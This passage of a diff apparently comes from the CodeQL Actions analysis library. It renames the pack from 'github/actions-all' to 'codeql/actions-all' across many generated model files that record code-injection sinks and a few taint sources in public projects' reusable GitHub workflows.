extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 8317fdabab0..bd4406f2454 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 529e1576e74..748e317edff 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index d659fbc8089..7bc47534814 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 9ca03d9aee1..060025b349b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index 725487f1005..408d0b8b524 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index 2bda8bb60a5..e24be2d0a21 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index e91b615cbe6..4e414057798 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e09e461e605..60c109da3e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index f8dd54aee14..1ac813e5e7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index c4aaa28f00b..13878976e43 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 546dac977a8..c66aff8690f 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 3a072fd9f07..b99f14b3c52 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 08a5f8fc58e..aa7b4a1c9b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 299c70daa54..2689698d33b 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index 3e03b65cb8b..3c9e6718f91 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 20eb977b973..a91b3ed66a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 4e58b2fa38c..fcfee85a8da 100644 
--- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index 6935bc7788d..11d56b2b70b 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 94d733fa0c4..a824d844d86 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 6b1214886fe..a7427768bbe 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index 4a97c50ad6e..505bb0cad07 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index a6e4c3473f2..0899d449725 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index be72ba18357..89a0ccfdb85 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index 5f4a4a09cd0..053e863a513 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index 4cadb751d75..88d66d40826 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index 1257c67c180..534936eab1f 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index f0daee8757e..6d4259a45e5 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 85d3b564a78..35d6bbd1b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index 01bda56c9a9..9dd893ca3b2 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 4c9e9b1dc8f..10dfdc0c63e 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 30e54f94fc1..fdc59aeb23d 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index bb0c172bf0e..4b520ea3954 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 3a5ad21b22a..f8630968c45 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml index c161072bd3d..4cf11f56fdf 100644 --- a/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/schemastore_schemastore.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["schemastore/schemastore/src/test/github-workflow/reusable-workflow.yaml", "*", "input.constraints", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml index 0362312f27a..44ad4f73076 100644 --- a/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/scikit-learn_scikit-learn.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["scikit-learn/scikit-learn/.github/workflows/update_tracking_issue.yml", "*", "input.job_status", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml index 2ae5aab3b2c..4d7af646901 100644 --- a/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/seleniumhq_selenium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["seleniumhq/selenium/.github/workflows/bazel.yml", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml index e2c8ae625c2..0f525b14607 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-packager.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-packager/.github/workflows/publish-npm.yaml", "*", "input.latest", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml index 13461b60205..fc96f1497e0 100644 --- a/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shaka-project_shaka-player.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player/.github/workflows/selenium-lab-tests.yaml", "*", "input.ignore_test_status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml index 88e02dd04c4..a57f0a86069 100644 --- a/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/shimataro_ssh-key-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["shimataro/ssh-key-action/.github/workflows/reusable-verify.yml", "*", "input.package_installation_command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml index 2f368497f01..ce86ebf4911 100644 --- a/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/softfever_orcaslicer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["softfever/orcaslicer/.github/workflows/build_orca.yml", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml index 64f3c208540..05212ab3264 100644 --- a/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/software-mansion_react-native-reanimated.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["software-mansion/react-native-reanimated/.github/workflows/build-npm-package-action.yml", "*", "input.option", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml index 9c2d7a421db..6d40d72d019 100644 --- a/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/solana-labs_solana.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["solana-labs/solana/.github/workflows/release-artifacts.yml", "*", "input.commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml index 1410fd6fbe9..f5ac697360b 100644 --- a/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sonarr_sonarr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sonarr/sonarr/.github/workflows/deploy.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml index eca441b608a..95140465bfc 100644 --- a/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/speedb-io_speedb.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["speedb-io/speedb/.github/workflows/build_ubuntu_arm.yml", "*", "input.verSion", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml index 2868aecd064..30cf3f54a2f 100644 --- a/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/spring-cloud_spring-cloud-dataflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["spring-cloud/spring-cloud-dataflow/.github/workflows/build-images.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml index 0aa2d1c596c..90937f50a3f 100644 --- a/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sqlfluff_sqlfluff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["sqlfluff/sqlfluff/.github/workflows/ci-test-python.yml", "*", "input.marks", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml index 02fe1b2055f..ec6a7385187 100644 --- a/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stdlib-js_stdlib.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stdlib-js/stdlib/.github/workflows/update_pr_copyright_years.yml", "*", "input.pull_request_number", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml index 9f6401ec03e..5079e80e761 100644 --- a/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/stereokit_stereokit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["stereokit/stereokit/.github/workflows/build.yml", "*", "input.patch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml index 373b507f2f3..ccaf2628951 100644 --- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "input.patch_path", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml b/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml index 9b68b660586..56344ff35b6 100644 --- a/ql/lib/ext/generated/reusable-workflows/supabase_auth.model.yml 
